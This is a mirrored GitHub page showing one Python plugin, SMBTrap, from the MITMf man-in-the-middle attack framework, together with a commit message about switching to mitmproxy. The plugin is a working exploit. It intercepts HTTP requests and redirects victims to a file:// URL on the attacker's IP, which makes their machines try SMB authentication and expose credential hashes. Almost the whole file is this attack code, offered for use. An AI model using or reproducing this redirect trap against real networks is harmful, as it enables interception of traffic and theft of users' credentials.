mirror of
https://github.com/byt3bl33d3r/MITMf.git
synced 2025-03-12 04:35:49 -07:00
eea5f53be2
Added a plugin system to Net-Creds so you can now add your own parsers, api hook names might change between now and the offcial release (will submit a PR to the original repo once completed) The main MITM HTTP Proxy now uses mitmproxy which is a big deal, cuts the code down by an insane amount, no more twisted! yay! Basic plugin have been re-wrote for the new proxy engine Since we are using mitmproxy we have out of the box support for SSL/TLS!
22 lines
724 B
Python
22 lines
724 B
Python
import random
|
|
import string
|
|
from libmproxy.protocol.http import HTTPResponse
|
|
from plugins.plugin import Plugin
|
|
from netlib.odict import ODictCaseless
|
|
|
|
class SMBTrap(Plugin):
|
|
name = 'SMBTrap'
|
|
optname = 'smbtrap'
|
|
desc = "Exploits the SMBTrap vulnerability on connected clients"
|
|
version = "1.0"
|
|
|
|
def request(self, context, flow):
|
|
rand_name = ''.join(random.sample(string.ascii_lowercase + string.ascii_uppercase, 10))
|
|
resp = HTTPResponse(
|
|
[1, 1], 302, "OK",
|
|
ODictCaseless([["Location", "file://{}/{}".format(context.ip, rand_name)]]),
|
|
"Trapped!")
|
|
|
|
context.log("[SMBTrap] Trapped request to: {}".format(flow.request.host))
|
|
flow.reply(resp)
|